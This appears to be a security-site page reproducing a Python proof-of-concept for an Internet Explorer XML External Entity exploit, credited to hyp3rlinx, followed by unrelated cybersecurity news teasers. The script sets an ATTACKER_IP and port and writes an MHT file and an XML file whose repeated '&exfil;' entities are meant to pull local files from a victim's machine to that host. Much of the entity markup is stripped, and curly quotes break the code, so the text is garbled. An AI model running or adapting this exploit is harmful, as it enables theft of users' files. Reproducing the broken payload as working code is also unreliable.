ATTACKER_IP=”localhost”
PORT=”8000″
mht_file=(
‘From:\n’
‘Subject:\n’
‘Date:\n’
‘MIME-Version: 1.0\n’
‘Content-Type: multipart/related; type=”text/html”;\n’
‘\tboundary=”=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001″\n’
‘This is a multi-part message in MIME format.\n\n\n’
‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n’
‘Content-Type: text/html; charset=”UTF-8″\n’
‘Content-Location: main.htm\n\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘MSIE XXE 0day\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘%sp;\n’
‘%param1;\n’
‘]>\n’
‘&exfil;\n’
‘&exfil;\n’
‘&exfil;\n’
‘&exfil;\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘\n’
‘
| \n’ ‘MSIE XML External Entity 0day PoC.\n’ ‘Discovery: hyp3rlinx\n’ ‘ApparitionSec\n’ ‘ |
\n’ ‘\n’ ‘\n\n\n’
‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001–‘
)
xml_file=(
‘\n’
‘”>\n’
‘\n’
‘”>\n’
)
def mk_msie_0day_filez(f,p):
f=open(f,”wb”)
f.write(p)
f.close()
if name == “main“:
mk_msie_0day_filez(“msie-xxe-0day.mht”,mht_file)
mk_msie_0day_filez(“datatears.xml”,xml_file)
print “Microsoft Internet Explorer XML External Entity 0day PoC.”
print “Files msie-xxe-0day.mht and datatears.xml Created!.”
print “Discovery: Hyp3rlinx / Apparition Security”
Credits: John Page (aka hyp3rlinx)
Cisco has issued an urgent security advisory (cisco-sa-twamp-kV4FHugn) warning of a critical vulnerability in its…
OpenCTI (Open Cyber Threat Intelligence) stands out as a free, open source platform specifically designed…
The notorious LockBit ransomware group, once considered one of the world’s most prolific cyber extortion…
A critical security flaw has been discovered in Cisco IOS XE Wireless LAN Controllers (WLCs),…
Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector emerged…
The Agenda ransomware group, also known as Qilin, has been reported to intensify its attacks…
